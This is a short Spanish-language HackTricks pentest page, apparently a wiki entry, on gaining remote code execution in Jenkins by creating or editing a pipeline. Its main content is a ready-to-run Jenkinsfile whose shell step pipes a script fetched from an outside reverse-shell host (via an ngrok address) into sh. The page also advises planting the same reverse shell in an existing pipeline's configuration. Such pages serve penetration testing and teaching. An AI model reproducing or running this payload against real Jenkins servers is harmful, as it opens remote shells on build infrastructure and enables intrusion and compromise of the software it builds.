Jenkins RCE Creando/Modificando Pipeline

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks

Creando un nuevo Pipeline

En “Nuevo Elemento” (accesible en /view/all/newJob) selecciona Pipeline:

En la sección Pipeline escribe el reverse shell:

pipeline {
agent any

stages {
stage('Hello') {
steps {
sh '''
curl https://reverse-shell.sh/0.tcp.ngrok.io:16287 | sh
'''
}
}
}
}

Finalmente, haz clic en Guardar y Construir ahora y el pipeline se ejecutará:

Modificando un Pipeline

Si puedes acceder al archivo de configuración de algún pipeline configurado, podrías modificarlo añadiendo tu reverse shell y luego ejecutarlo o esperar a que se ejecute.

Tip

Aprende y practica AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Aprende y practica GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Aprende y practica Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Apoya a HackTricks